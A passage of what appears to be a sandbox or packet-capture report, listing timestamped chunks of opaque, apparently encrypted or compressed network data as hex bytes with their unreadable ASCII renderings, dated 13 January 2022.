                          Data Ascii: m i6X/v%,#8Jm(_*g]sG[&"|tE(]sXQcI==f/MF^jx@zzpoQK#;Gz9k6gaHgl>sa?ecE<z4<IU:]uwQ4d/Ww16B^7M%. jf@M1
                          2022-01-13 19:22:56 UTC1051INData Raw: 3f c2 0a 92 eb 8f 31 42 67 60 dc fa 48 a4 8b df ae 26 27 9a 19 82 14 ab 42 82 99 b0 2c 76 ad e7 a9 83 d9 a2 b8 4f f1 86 25 57 29 f6 0b d4 57 0d 00 d8 f4 32 80 f4 85 cc 87 b3 a8 1d 0a 70 d3 95 75 e3 16 2b 3f 31 90 6c 8b 7f 84 26 de 28 74 0b 28 0a b5 b2 3d d5 05 3a 23 e5 3f b0 c3 8a 27 1d 65 35 93 81 2f c7 6c 89 cd d2 72 92 63 72 17 ac 3c 2a 02 3c 99 c7 de 4b 33 76 19 df 08 bd e5 ac 01 34 6d a8 f0 a5 91 e3 b3 27 c7 60 e6 b9 de e0 0a 06 98 7c b4 2b 12 ac 0f 5f 03 4b e9 29 28 b9 3a b1 5e de 35 86 c6 48 c4 c6 dd 16 f1 d8 af 3b c6 63 bb 6b 18 53 59 6d fd c5 4e df 84 c8 fd db ed e7 0f c8 e4 ae e6 a4 0c 4a ce 72 85 cd fd f0 b0 2e 09 77 7c dc 63 dc 87 ce ea ab b8 70 c9 79 2c 7a e3 19 dc 0c c3 56 ef 92 83 c4 7b 83 eb 30 16 43 52 15 bc dc 81 c6 d5 62 d5 8c 5f 7a a7
                          Data Ascii: ?1Bg`H&'B,vO%W)W2pu+?1l&(t(=:#?'e5/lrcr<*<K3v4m'`|+_K)(:^5H;ckSYmNJr.w|cpy,zV{0CRb_z
                          2022-01-13 19:22:56 UTC1052INData Raw: 68 9d 55 6b 1c 63 1b 99 46 1b f8 55 7f 1f 49 54 e7 85 7f c4 39 14 b7 06 1b 07 d8 82 d7 ee be 97 48 68 79 a9 09 a1 30 48 72 08 16 ba cd e4 b2 2c 15 76 02 be 3e 5e 7c ef 58 6c d4 01 32 4a b9 c7 20 91 f9 83 d3 f1 68 0e 4c 99 f2 ac d5 64 da a0 ad 44 4e 64 5c 6f 0b c2 dc e7 4f 2d 8b 8e 08 a2 1d 4e 6d 14 f8 a3 9b 15 1c 09 25 fc f3 9a 6b a8 ec 42 d3 33 21 12 f0 1e cc 72 4f 00 44 aa c2 63 0b 34 10 e8 5c 9f 0c 1a 1a 93 b5 39 a3 dd 68 08 f5 38 3c 76 a2 fb 96 85 d4 be c7 d7 b2 3d fe 62 12 ff a5 21 30 bc cc fa 40 59 04 cb 6d ed 57 77 2c a2 e8 bd df f0 af 10 80 26 70 a0 a6 51 44 ce 48 7a 59 37 46 72 29 1e f5 64 38 6d f1 96 99 11 c2 5f 75 8a d7 74 5f 3f c5 ad eb ce eb 6e ef b0 6f e6 a5 d1 6c 1b a6 99 e7 65 19 6c 22 62 cb 48 60 45 31 2e c5 c9 66 92 75 45 3d df 03 1a 00
                          Data Ascii: hUkcFUIT9Hhy0Hr,v>^|Xl2J hLdDNd\oO-Nm%kB3!rODc4\9h8<v=b!0@YmWw,&pQDHzY7Fr)d8m_ut_?nolel"bH`E1.fuE=
                          2022-01-13 19:22:56 UTC1054INData Raw: a6 04 0a 60 10 ed c4 78 d3 74 a1 23 e2 df 9f ef 44 3e ac cf 74 ae 4b 27 ec f8 fa 49 46 22 b5 c8 87 ce be cd 7c a8 ac e0 9d cd 29 c5 cc d2 b4 f5 9e 09 7c d7 c9 61 61 72 ac 53 3e 98 93 b3 dc 9d 9d 2f 60 a7 ec a0 17 c3 cb aa 3f ad 07 82 cb 1f e1 14 f9 74 d1 03 2d 95 48 03 46 78 60 bb 27 46 02 a7 f8 5c f9 d4 ab d1 3f 58 18 4c 94 0c 2b 8c 74 45 4d 4c 3a e2 9c 64 95 82 4b 52 ca 53 9c 1f ae 67 5a 7d 1b a7 57 9e 75 b0 c9 02 a8 28 18 54 e8 3a 3c 94 a4 5c 97 f4 5e e3 51 5c 78 7e f9 0a f9 f6 dc 93 ff a7 9e 38 df 10 4b 32 d2 11 81 be c2 cf 69 01 29 9d 47 44 30 1d fa 46 c7 34 1e 73 29 eb 9e e3 7d 3b b9 5b 7e a3 04 57 0b 2f 54 91 f9 e8 c4 1b 6d d8 d3 a3 ae 93 71 58 4b 51 ef 22 eb 30 08 a1 e3 59 39 4a 65 e0 4d 05 2b f4 9c e5 f0 aa 24 43 4f 53 5c 06 85 8d e7 24 73 3d d3
                          Data Ascii: `xt#D>tK'IF"|)|aarS>/`?t-HFx`'F\?XL+tEML:dKRSgZ}Wu(T:<\^Q\x~8K2i)GD0F4s)};[~W/TmqXKQ"0Y9JeM+$COS\$s=
                          2022-01-13 19:22:56 UTC1055INData Raw: 36 43 42 92 cc f3 cf 6f 1a 74 cf 35 b1 ab bb 49 27 e3 da 58 e3 1d 02 70 c3 3b b4 33 57 66 83 7f 17 ba 7d ef 7e c4 7d dd 7d 3f 6d 97 45 ec b7 a3 89 45 05 bb 9d 82 54 ee bb b6 15 95 ea 10 f6 3a 2b 84 50 f3 8e 2c 9d a2 49 90 52 40 1d 29 ca ad 73 84 22 d9 1c da 9b 9d 84 46 df 7f a5 18 95 bb 58 e1 0b c2 bd ec 13 ef 2c 17 df 6c 14 73 6f fd 6a a7 96 61 7f ca f2 cf 7e a1 1c 2e 71 8c f2 6a 9f 94 78 d4 54 5f 74 d8 7f e0 fd 05 d9 15 ad a3 f6 48 1c df 0c a1 89 ab a6 da 68 88 b8 3d 16 44 f0 53 4f e5 3a cb 67 46 50 3a 36 1b 7f a4 12 4b fc 89 bc 53 c4 f0 b8 2a 16 2b cf 6b 5d 25 b0 66 f3 c2 c5 85 c1 4a 70 6a ec d3 70 8c dd 03 21 01 f1 4e 3b 77 50 6c ba cb 6f 1c c7 c1 7d 2a 13 df 6c c0 a0 42 7a fa 0c 27 fc 7b e6 ba db b8 f9 b5 c5 58 2e 8e 7d 3b 43 69 7c 0e 8e 18 e8 7c b3
                          Data Ascii: 6CBot5I'Xp;3Wf}~}}?mEET:+P,IR@)s"FX,lsoja~.qjxT_tHh=DSO:gFP:6KS*+k]%fJpjp!N;wPlo}*lBz'{X.};Ci||
                          2022-01-13 19:22:56 UTC1056INData Raw: f3 a6 0f 8b 10 55 6e 76 69 6c fa 54 32 d7 0c 58 5c 39 c7 8f 3d e6 d4 19 33 93 b7 f9 f9 cc 8b 7e 05 41 4f c8 ac 24 65 1f 30 00 06 11 02 a5 82 45 3e d1 91 f4 24 71 ca d9 1d fb 32 d2 92 d3 b7 e3 1f 5c c7 29 39 38 9d 9c 7f b5 b3 bc f3 c9 73 cc 21 9b b2 86 69 5c 98 19 26 8f d5 70 95 83 3c dd cc 4d ba d6 38 91 ac 29 93 ef fa 5b 21 7d ad 14 af be 1f e0 22 fa 08 60 ff c6 d0 e7 66 2b af eb e9 b5 1a 84 e4 9b 88 71 23 30 29 a4 3d 82 71 06 8b fd e9 11 ec 8a 66 b5 98 00 09 21 5c 49 35 de a0 18 4c d2 82 43 7a 64 9d 8c 26 62 17 ab be d2 1b 3b c9 36 dd 0b 20 61 a3 e6 3c 3e 95 8e 02 35 75 4c 9f bd 36 b3 0d 44 40 94 dc 94 82 2b 33 59 12 31 9e 55 02 b1 af 04 6f 7c e4 61 d7 f8 ca 75 aa cc 2a 1d 86 e3 22 b0 1e 0f 67 17 43 5b 17 48 74 cf 0c 25 e0 db c0 cd 76 de 95 9f f9 df 09
                          Data Ascii: UnvilT2X\9=3~AO$e0E>$q2\)98s!i\&p<M8)[!}"`f+q#0)=qf!\I5LCzd&b;6 a<>5uL6D@+3Y1Uo|au*"gC[Ht%v
                          2022-01-13 19:22:56 UTC1058INData Raw: 14 d1 c2 80 d6 f9 d0 36 26 6f f6 91 e6 36 31 38 76 b8 df eb 34 f1 36 65 61 e8 a2 0f cf 78 66 f8 44 3d b5 61 a3 99 56 ca 12 68 77 02 bd 41 b4 f1 f2 94 62 8b cc 4e 97 ff 1f d5 7c 2c 77 20 f8 85 b3 24 7f e4 e2 7c e1 17 4f 1d e8 7a 76 ab 34 39 24 55 e9 1b f9 c7 6d df c5 95 ee b2 22 e7 49 5d d2 5e 83 54 fc 75 78 7e 87 cf d0 e4 2a cf e5 9e 18 fd 6a 81 4e 04 12 32 0d 09 e7 3b af 8a 58 77 ec 6d 0a b9 43 28 bd 50 1c 5d 7c 18 ee a6 bf 52 f3 97 6e ec b0 bd 16 4e 77 93 fc fa b9 49 94 b1 bc 64 bb c8 54 e4 14 81 d1 87 f3 dd d9 08 54 20 ab aa 21 e3 8b 38 3e ec 97 f9 64 55 e4 08 a1 b4 68 2a ee a1 18 2a 0a 2b c2 da 23 c5 e3 60 ec 7c 73 3a d6 bd 4f 45 50 12 90 a5 94 7c aa 87 ae 38 88 82 2e 90 7b 10 0b 6d f6 47 d4 1a 73 fb e3 1f 40 74 b1 00 bd ca 90 f4 be c6 d3 76 76 1a 75
                          Data Ascii: 6&o618v46eaxfD=aVhwAbN|,w $|Ozv49$Um"I]^Tux~*jN2;XwmC(P]|RnNwIdTT !8>dUh**+#`|s:OEP|8.{mGs@tvvu
                          2022-01-13 19:22:56 UTC1059INData Raw: 01 f8 e2 13 1f e9 3f 10 11 2e d0 11 57 03 c5 77 70 c8 96 a5 e9 d9 b6 07 2d 9b ce 10 2a 36 c6 4c a8 12 80 a8 06 5f 68 77 4a 1d 87 2d f2 90 ea 51 50 6c a7 82 89 e6 a3 50 c5 5d 15 ec d0 3f d4 89 16 cd 17 c0 b4 e4 48 36 0d 7a 9b 9b 85 1d 92 cb a1 15 b1 b1 40 e6 b5 6c 89 3e 84 90 68 9c 89 31 fe 00 e8 19 8b 71 0f 9b 31 9c f3 e6 2b 02 ce a9 87 ce 87 e2 8c 47 65 6b b6 3c c6 d3 71 38 37 ad 33 7f bb 30 d7 f4 4a d7 16 5f 99 4a 7f 23 36 a9 92 6a 9d 9f 3e db e4 15 03 cb 1b f4 49 5c 10 a4 a2 e2 58 5e 98 69 16 51 b0 82 ab 44 fc be ad aa 35 8e 85 23 43 5d a8 ae 53 4d 40 24 cb db a2 ed f2 f0 d3 6f 11 d3 c6 3c ce 44 e5 c6 b1 a0 06 bd a5 65 b6 8d 3b 13 bd 5c f3 c3 bd ba 7f 6e 4e 33 14 47 55 68 3d 1e 9a 90 a6 ae ab ac 25 f2 a6 a4 a6 e7 ef 88 9b 4a 4b 46 dd 1c d2 4f bf ff 04
                          Data Ascii: ?.Wwp-*6L_hwJ-QPlP]?H6z@l>h1q1+Gek<q8730J_J#6j>I\X^iQD5#C]SM@$o<De;\nN3GUh=%JKFO
                          2022-01-13 19:22:56 UTC1060INData Raw: fb 74 8b 8c 97 1d 4e 99 dd e7 85 f7 8b c8 82 e3 1f 96 e3 5b 09 d8 71 69 1a 3b af 5c 3f f1 7a 66 33 6f 48 c9 3a 43 c2 c2 bf 42 2d 81 7c 7d 22 ac 98 24 70 a6 11 c3 95 f6 5a f7 c4 96 28 c3 32 bb 42 87 27 93 ef 7d 67 75 b9 1c 04 40 c8 b2 21 bb 28 e9 a7 c9 7a fc e7 51 05 94 9c 6e 43 af b5 bc d1 f5 96 16 b7 32 51 51 02 21 53 b9 14 f1 4f f2 fd 2e 7d 33 c5 1f 56 00 c4 ab 3b 42 6e d7 73 3c 6b 6c db 15 4f 04 fb 38 2a b8 7b 5b 18 56 46 d9 0a af 41 72 a4 12 4c 6c 18 3e 29 c2 16 12 01 64 d1 ad 62 3f eb 30 0f cd 6d 46 81 18 68 b4 55 f7 d3 2f 8c ab bd 47 50 dd 19 e6 64 f6 61 62 e9 b9 40 4c 48 9d e0 cd c7 eb 48 2e 00 b8 69 e7 85 76 26 63 ae ca eb 9c 61 7f 3a 40 8f 52 94 61 c5 5c f4 03 49 da 5f e7 96 67 9d 14 4f 4a cb 6a 3e 5f 7d bb 39 4f e6 f8 43 14 e9 40 5d 12 13 cd 53
                          Data Ascii: tN[qi;\?zf3oH:CB-|}"$pZ(2B'}gu@!(zQnC2QQ!SO.}3V;Bns<klO8*{[VFArLl>)db?0mFhU/GPdab@LHH.iv&ca:@Ra\I_gOJj>_}9OC@]S
                          2022-01-13 19:22:56 UTC1062INData Raw: 74 73 35 e0 34 a0 56 f7 c2 d3 10 5a e8 71 39 b8 99 1d 89 6b d6 f0 5b 98 32 07 38 3a c5 7b 77 4f 4c d7 a4 f5 df f9 b8 f3 b6 99 43 d7 1c 2f 8f 9e cb 1c 0b 67 48 a7 e5 76 07 9b 31 9d 89 d2 89 43 f2 52 bc af b0 44 2d 89 c5 c9 e8 dc 3e eb 54 9e ef 2a 12 09 43 a8 cb 0d c0 d4 52 b0 8f 51 21 95 8f ef 15 b8 20 6a 79 ea d0 b6 79 69 88 7a f7 16 fc fa 41 b9 43 bd 2d 99 3f ce f2 5e 42 fe 3a 93 f3 bf f4 fd d7 1f f4 c0 e9 7e aa 2e 13 cb 0c d9 be f4 41 a4 01 43 e6 33 07 19 d0 f9 c8 f5 b5 d6 9b f9 81 db 1e 7b 32 82 e9 2e 0d ca f5 a0 a7 ff d0 89 c6 64 eb 2e 09 78 b0 3e 20 6c 01 c0 f8 45 57 68 f6 e2 2d 9e 7a b0 94 18 43 b1 1b 81 cd 16 f5 72 a5 fa 07 49 4d 49 50 c6 dd a2 cb 9d 6a 4a 3d 19 7c 5c f0 d7 1a 8b b7 a3 83 5d c4 ba 55 02 b7 a2 a4 fb d8 ea c9 06 a2 ff aa 3a 31 24 a9
                          Data Ascii: ts54VZq9k[28:{wOLC/gHv1CRD->T*CRQ! jyyizAC-?^B:~.AC3{2.d.x> lEWh-zCrIMIPjJ=|\]U:1$
                          2022-01-13 19:22:56 UTC1063INData Raw: d0 62 72 78 2f 29 91 93 0e 47 35 3c ed 9d 71 83 4f 66 23 7b 27 68 62 e3 87 62 b6 56 73 5c 02 05 db 60 ea 82 e7 9d 8f 4a bf fb 94 68 c3 e1 b2 5a ea d6 fa f2 aa df 02 99 5b 99 fc e7 ff 94 04 1c 18 ff b0 0c 33 e0 3b 18 33 96 47 f0 4c f9 d3 8f 13 7b de 91 7b 5b e1 64 ee d6 9e 3b 0c fc 47 e8 ce 56 8c 34 7c b6 15 41 0e 59 f9 b3 25 82 31 e7 35 ae b1 5f 6d 8d 90 cc 81 b1 dc 8e 55 9d 5f 24 2b c5 fe 7f 87 19 5b b3 17 6f 0a c7 f0 0f eb d0 42 2a 97 10 79 e2 7b 16 56 f1 22 7b f2 f9 f9 01 2e 0f c1 9a 98 4b 56 e0 9f 36 87 b2 92 01 4a b0 2f a3 04 07 2c c1 36 01 23 f3 90 f3 72 e3 14 49 57 c0 6c 9f 29 7f 2d 98 11 61 b4 e1 04 ae 3b b6 73 85 a9 5e 52 2b 40 a2 89 73 a7 bb d2 00 af 7e c8 e2 9d 83 59 14 30 b1 d9 21 54 8d 9a d7 91 bb 5b 6d 19 2f 93 9e e5 fa f9 bc 63 aa 67 02 ac
                          Data Ascii: brx/)G5<qOf#{'hbbVs\`JhZ[3;3GL{{[d;GV4|AY%15_mU_$+[oB*y{V"{.KV6J/,6#rIWl)-a;s^R+@s~Y0!T[m/cg
                          2022-01-13 19:22:56 UTC1064INData Raw: 34 bb 18 41 a5 5b 86 4d 4e 44 6d 04 af 76 2b 9a 7d 7e bb 0e 41 27 b5 b2 28 a1 33 86 5c 19 0e 4b 28 a2 94 da ef 3a 28 72 e5 5a fd 55 fd d3 78 5e 25 81 86 4b 01 24 76 5e 76 a3 98 cd b6 3c 44 93 00 7c d7 09 3d c8 81 ac 37 d2 5e ef 39 31 19 cb c6 1f 9c b6 29 da e6 ef 38 71 3a 2b cb e0 8a 59 8c 92 65 7d 9b 55 d7 7f c9 77 4b 15 ad ac 27 54 f3 c9 8e bc ae b1 44 2f 78 b4 6c e7 64 85 8d ec a7 f4 b6 30 0e fb 10 57 01 86 cd ab c4 d8 8f 8d b7 c1 53 72 36 0b dc 31 4e a5 f4 4d 63 d0 fa 42 d5 b3 bd 04 f5 94 c1 74 fe 97 b5 d5 77 70 f4 c2 d0 4f 59 13 7a b0 96 69 71 27 fd d8 fe 23 09 fd 85 9a 96 1f 47 f0 a6 bd f7 c3 c8 0b d0 52 61 ac 87 6b dd 6e 91 6f 00 a4 12 e7 9c ce b8 2a 76 bb 87 b4 2b 96 d3 22 08 f5 81 a2 0b fc 65 07 37 30 35 d8 c5 3b 33 d8 ec b9 79 07 27 f2 a9 47 c1
                          Data Ascii: 4A[MNDmv+}~A'(3\K(:(rZUx^%K$v^v<D|=7^91)8q:+Ye}UwK'TD/xld0WSr61NMcBtwpOYziq'#GRakno*v+"e705;3y'G
                          2022-01-13 19:22:56 UTC1066INData Raw: ff 73 97 e7 25 e0 0a 39 ad 4c da cd e0 cf 6f 4e c6 d8 63 86 40 29 30 db 0a dc 25 54 00 d7 06 b1 c8 99 91 eb 03 87 db 0c ad 7e c4 92 6a c8 fa 57 d7 85 cf 76 0b 22 66 68 46 db 68 2c f9 18 32 19 d6 e6 df 77 3e f3 5f 6d 0d 79 f6 26 31 9b be c9 6f ac d4 ef 3b 18 9e 02 d5 e0 02 19 b1 b1 b1 cd 2e 71 20 c0 47 4a d7 ba 0c 31 da 8e 36 13 c2 aa da 88 49 de 63 01 c4 1e 71 59 cf 97 27 93 ff d6 fc 2a 6a 8a e0 3f b1 b1 05 fd ac 81 4b 4c 6c 98 25 9d d9 0a fc 5c e4 8b 5c e3 14 bd 99 f4 3b 39 39 1f 99 e0 96 04 f5 a9 8b 9b 62 80 48 77 e3 78 1b 05 94 15 d1 6c cc d6 e5 10 3c 7d 31 de 8e 07 9a b3 23 97 ff da d7 03 34 be c9 77 b6 90 cf 12 46 c0 80 f8 66 67 4d 04 ad f2 52 a3 d6 97 df b2 32 0d 6b c0 26 d8 80 41 8e dd 13 cd c7 26 7e a7 a0 8d fd d7 a1 d4 f1 87 da cf 0f 9d 91 b1 bf
                          Data Ascii: s%9LoNc@)0%T~jWv"fhFh,2w>_my&1o;.q GJ16IcqY'*j?KLl%\\;99bHwxl<}1#4wFfgMR2k&A&~
                          2022-01-13 19:22:56 UTC1067INData Raw: a0 71 38 75 19 d6 81 6b 74 b1 18 e0 8c e4 7a d1 dd 4b 20 22 30 56 7e 84 15 0e de 24 7b cc 28 a7 d9 79 94 18 3e 57 14 52 a4 23 e4 af 00 c0 d8 f8 39 bd a1 b3 ad b9 e1 02 1e aa 58 f4 f8 56 be 89 8f 40 09 7e 65 da e1 9f b9 d4 74 a4 87 e3 ca 20 70 c0 7d 2e b5 a1 e6 37 c8 80 0a ba 8c 5b 22 7f 21 49 43 dc 26 60 af b0 7c a6 4f 57 f5 69 10 32 72 09 81 b1 12 d6 a8 18 41 ab d3 08 60 1d fd c2 db 1f f1 fb 66 8b c4 6a 01 2a 15 89 f3 cc ee 0f 11 3b 1f 32 95 f4 cf bb df 32 41 71 81 7b 54 01 28 8b 8e 16 cc 94 15 4f b3 d2 ec da 65 07 6f 45 25 5e 9a 03 8c ae 45 a7 41 fb d1 e6 4a d6 20 0e 8d fb de 92 76 03 08 e7 f8 1c 32 15 fc ea bb f4 ac 51 c2 cb 83 ca 82 20 11 33 40 6b b1 44 5b 26 9f eb 2a 05 6a 65 11 5c 1b d6 15 3d b9 d3 cc e6 0c f8 5e 55 82 53 cc 50 cd cb 85 db 1a dc 76
                          Data Ascii: q8uktzK "0V~${(y>WR#9XV@~et p}.7["!IC&`|OWi2rA`fj*;22Aq{T(OeoE%^EAJ v2Q 3@kD[&*je\=^USPv
                          2022-01-13 19:22:56 UTC1068INData Raw: 23 eb f3 ee bf 4a 5e 1e db 75 2f c3 41 bc cf eb bd 2c e5 ef 96 68 4b 2d 25 62 77 3b b7 ac 7a ce f9 87 c6 d7 01 85 0c 37 1f 25 bd 35 d6 54 ef 23 e4 af f3 66 b1 f3 12 07 37 fb c9 f7 75 dc 83 c1 50 a5 eb 3b 72 9a 76 ac b6 ae c5 5d 70 aa 60 9b ee d0 f9 d7 1f 73 84 48 ce f1 38 79 45 40 ec ea a3 9e 4d 57 fc e1 07 25 f7 c5 3c be 58 19 c9 76 b1 d2 f2 1e 70 bb 43 f2 5f da 26 9f 80 4f 44 4e 49 a1 74 a0 1c 73 49 43 5b 66 9b f5 92 75 68 fb 77 8f 61 7c b0 28 7e d6 99 a8 94 6f 05 8a 8c b8 21 d3 1f 37 e9 2a 27 ba 53 76 ed ee 99 63 5c 53 dd 24 b3 92 23 eb 9d ec d0 5c e7 99 e6 da 95 f4 43 c1 19 5b bb 17 d6 9b f2 41 c4 72 09 1d fc 47 43 d8 d4 68 3e 1f e1 07 29 98 08 b7 b4 35 16 65 57 68 82 5a f2 3d 31 7e 86 51 55 6f 7c f6 e1 89 e2 9e 04 a5 91 f7 d9 17 d9 fe 9b b4 c5 25 6a
                          Data Ascii: #J^u/A,hK-%bw;z7%5T#f7uP;rv]p`sH8yE@MW%<XvpC_&ODNItsIC[fuhwa|(~o!7*'Svc\S$#\C[ArGCh>)5eWhZ=1~QUo|%j
                          2022-01-13 19:22:56 UTC1070INData Raw: d2 6c 80 4e d8 8e 0f 98 df ac 2a 02 b8 29 98 ed 35 94 6c 39 42 5b c1 8d 84 f0 64 df 64 ce f2 5d 6a 8a 2a 97 97 e5 51 5f b9 43 b9 42 8e af dd 03 cc a4 74 fd d1 74 0b fd d0 f5 a4 d8 55 cb ad ce 88 c7 c6 c9 68 85 cd 11 cc 3a 3f a9 9a df 89 69 01 28 06 bf a3 50 d4 9d 81 3f a5 98 7e f0 bd 45 4a ce 6e 75 2c 17 d7 0b a2 a9 7b 3d d0 f1 b0 27 ff c2 39 79 5a 94 f8 0b a7 f2 54 78 ab a7 86 5f b2 41 14 bc a8 8b b0 58 bf 4a 99 e0 3a 5c e6 c7 f8 21 96 08 d2 e1 54 d1 7b 36 e7 14 a4 d9 6b f9 07 48 67 c4 94 c7 a8 bc e2 d9 d3 5b 50 0c a0 60 68 8b 6d 14 2a 19 d1 65 7e d0 a1 01 1b a4 19 dc 87 dd bd d7 0a b1 b8 2a 84 9d ed 4e 7e fb ca b1 23 45 57 61 6d 08 a8 de 8a 46 c7 23 fe 4b 5f 78 27 14 4b 46 d4 fd 54 d6 e8 d5 35 0b 56 ee a3 93 e3 02 75 2c 0a af 32 a7 e7 b7 4e b9 e6 fc 2d
                          Data Ascii: lN*)5l9B[dd]j*Q_CBttUh:?i(P?~EJnu,{='9yZTx_AXJ:\!T{6kHg[P`hm*e~*N~#EWamF#K_x'KFT5Vu,2N-
                          2022-01-13 19:22:56 UTC1074INData Raw: dd 15 ce fd c5 b3 be b2 70 de 7f 14 07 5a fc 56 f5 8f 9f 61 b4 52 a2 02 a4 01 69 6d 4e c7 38 45 3a 4b 4f 4e 90 74 b5 09 ed 4e 9b be 98 26 b7 f6 f1 b7 4d 69 87 c7 ea 8c 97 4e aa 81 c8 53 4a 3d 51 80 3c 65 a7 6f 72 00 11 f4 ea 1a 47 d7 ef 32 85 23 e4 37 1c 7e 13 35 9f d1 de 25 ec 1e 8e 08 e0 f9 69 6e a9 e7 b8 86 ea a2 6f da 3d 81 86 56 ad b8 fc b9 70 1f fd 91 f3 19 31 bf 16 57 27 f8 84 f4 75 7d 2e 11 d2 33 7f d5 99 43 06 5b 37 68 65 09 82 56 fd c6 f1 3a 29 28 5b 11 b6 7f b3 f5 ae 3f 02 e5 30 0d 5c e8 12 97 85 7b 2c 6b a6 80 44 31 92 c4 da 8d ea cd 77 6a 8f 37 a8 1f 90 61 74 af 41 af 5b 29 fc 37 09 a0 3e 2a 1d fa bd 66 d7 b5 ef 3c 8f 87 c0 7b 81 23 65 fa 55 1c 19 7b 85 af bd 9e 20 73 3b 37 0e db 49 50 c7 21 96 15 62 4e 6c 37 2f 98 06 a9 7e 8d fb ca 44 98 38
                          Data Ascii: pZVaRimN8E:KONtN&MiNSJ=Q<eorG2#7~5%ino=Vp1W'u}.3C[7heV:)([?0\{,kD1wj7atA[)7>*f<{#eU{ s;7IP!bNl7/~D8
                          2022-01-13 19:22:56 UTC1078INData Raw: 9a d3 0e eb d1 64 ee fa d2 85 ad b5 a8 d1 67 0e ad 7f 32 a3 49 ce 14 fe b1 bd 36 8d 0f 09 46 85 cf 11 d5 5a 39 b7 ac 99 30 78 5b a0 4c 2a a2 ea a3 da 97 a5 89 93 e2 0f a0 18 38 6f 0e 39 d3 af 47 45 5e fb c8 fe 9d 6b 1a 6c 91 e8 a6 08 40 fe 43 be 26 a4 76 0a 09 30 61 1b e1 65 dd 0e 58 5f bc b2 71 b4 0b 8c 83 52 f3 35 56 62 3b 75 06 aa eb b7 ab f7 44 43 28 10 a1 81 b7 dd b5 e3 7b af d6 2e b9 54 9d c2 b2 50 ba 0f 71 37 b2 3a 32 12 86 ec a1 91 e6 ac 20 6e d4 2b 84 56 0a 61 03 9c c7 ed 3d 56 23 b8 ad 8d ad 66 23 4b 47 05 ac 5e ed 55 2e 08 2b 3c 23 8e 35 fa 33 ed 20 d9 cc ee b2 a1 e6 a1 fd b9 e6 b1 bb 4d 91 f7 cf 99 24 19 5e 25 49 54 97 50 07 6f 42 ca 68 64 9f 25 d5 3d 62 85 3b 2d ed 4a 6a 9f 3a 3d 16 57 73 3e 44 9e 40 5a bb cb 7f 34 ca 0e 72 d5 97 2e 05 3e 2f
                          Data Ascii: dg2I6FZ90x[L*8o9GE^kl@C&v0aeX_qR5Vb;uDC({.TPq7:2 n+Va=V#f#KG^U.+<#53 M$^%ITPoBhd%=b;-Jj:=Ws>D@Z4r.>/
                          2022-01-13 19:22:56 UTC1079INData Raw: 61 39 a0 73 ff d4 f1 80 89 ba 7a 6a 1a 40 a1 e2 f0 29 6e 8e ca 90 27 f1 6d 05 41 00 73 4d 3f cf 33 87 d0 28 1a 6f fc 8f 84 cc c7 90 a8 67 96 be 92 34 54 70 64 dc 56 c8 94 cf 76 1d ee da 23 4d 26 1b 49 0b a6 79 6a 3f 41 c0 77 97 ec c1 fd a4 2f fa a3 9f cc 98 26 da d1 67 76 37 fb c4 79 d2 f1 fa ef 1a 18 4c de 9d 11 97 c3 fe 03 31 39 e1 02 3f ed 38 81 8c 53 48 d5 9f 88 46 2e db 6a 2b 5b 86 3e d1 6c f0 d9 6b 02 27 6b 1a 66 31 4b 2b 31 4e 23 89 70 db 68 fb c9 04 76 a5 8a b4 f7 b1 e2 df 9a a5 db 99 d8 c3 85 82 18 9c 05 30 14 5d 20 cf 55 3e e9 a7 74 31 e3 ba df a9 9f ed a3 79 48 43 9c 97 43 af 19 d3 78 ea cb f0 08 ab 61 95 e7 3c 35 92 d3 65 6e 59 83 c5 49 5e ec b0 83 29 8c fc cb ee a5 8d ef 2a ab 47 4e b0 57 cd 8c 3b ca fe 89 7f d9 13 5b 5f 9b 3b c5 bd 86 4b 4b
                          Data Ascii: a9szj@)n'mAsM?3(og4TpdVv#M&Iyj?Aw/&gv7yL19?8SHF.j+[>lk'kf1K+1N#phv0] U>t1yHCCxa<5enYI^)*GNW;[_;KK
                          2022-01-13 19:22:56 UTC1083INData Raw: 95 20 f9 27 23 5c 17 1d 40 8d c2 41 54 d3 35 38 cf 46 85 b2 66 9f d0 8d 70 d9 3f cb 10 53 3e ef 39 af e1 11 81 b8 aa 9c d7 7f b9 50 3b 77 27 e0 28 de eb cb b6 6f 1c 2f fa c1 c3 0e 5a fe 52 a4 66 53 eb 78 bb 4a c2 dc 2d 30 52 d6 96 65 a3 61 29 83 c2 d4 6e 72 5e f4 4b 50 39 4a 4e c4 d5 74 0c fa b8 a6 fa a1 20 85 2e 41 58 06 16 f4 ff 75 3a 25 38 33 8d 60 3a 65 05 76 ce 57 1c f1 51 2c cd 8b 79 31 04 5a 74 3b 4d f1 9a c4 7a 27 43 1c ff 39 07 93 04 1d 43 5e 3e 6a 32 a3 4a 61 c9 a9 95 de 55 6f 0b 91 e7 7e a3 f7 bd 58 a1 37 a9 9e bf 87 20 c8 01 f0 51 95 8e 89 51 5a f7 c2 4e 69 2d e3 70 a3 20 b5 b2 29 15 f2 ae f4 3a cd 47 20 d7 71 3e 39 ab 30 6e a1 eb 2a 4b 89 d7 17 4e 6d ca 71 92 79 3d d5 1c f4 ae 58 ef 49 80 43 a0 9e 6a e0 35 aa 47 89 3f ac 34 01 56 33 90 65 b1
                          Data Ascii: '#\@AT58Ffp?S>9P;w'(o/ZRfSxJ-0Rea)nr^KP9JNt .AXu:%83`:evWQ,y1Zt;Mz'C9C^>j2JaUo~X7 QQZNi-p ):G q>90n*KNmqy=XICj5G?4V3e
                          2022-01-13 19:22:56 UTC1087INData Raw: f2 43 ad 72 ad a2 9c 62 e4 06 08 d9 70 c9 07 56 81 d3 a9 97 eb 27 45 97 94 3f ef c1 8b 8a cc d3 27 3c 6e 1e 98 e5 1b f1 1f 8b 26 40 e1 e3 7d 91 ea c6 b1 fa fd 56 8a c4 26 1e 13 ce 66 4a c5 4e 65 67 79 94 36 7d 53 47 9f 11 c0 df b8 d0 9c 44 3d d0 9b e7 8a 8a 48 c5 1e 60 ab de 93 46 13 c9 76 0b 80 bc 64 6b 6f 63 46 d0 a2 06 df 69 12 fc 5e f5 c1 f1 8b 3f ab a4 14 2f 9a 8d 33 81 c7 8a 90 89 66 ec 1f 5a 02 b2 3b ac 41 c0 cd 2a 97 e4 b0 85 b2 46 81 c6 a5 fd d9 5c 27 e3 03 7b 2a 41 c0 c4 82 99 fa 4a 6c 23 9c 6b 50 c3 00 b9 25 84 57 16 55 6b 07 db d6 dc d8 87 ac f2 46 c3 ec cc a1 f8 5a 64 2d 88 4e 41 37 da 39 6d fb b6 7f c6 9f 93 93 b7 bf 76 af a7 92 c0 3f d1 e6 db 69 83 70 27 98 18 22 0e 38 6e 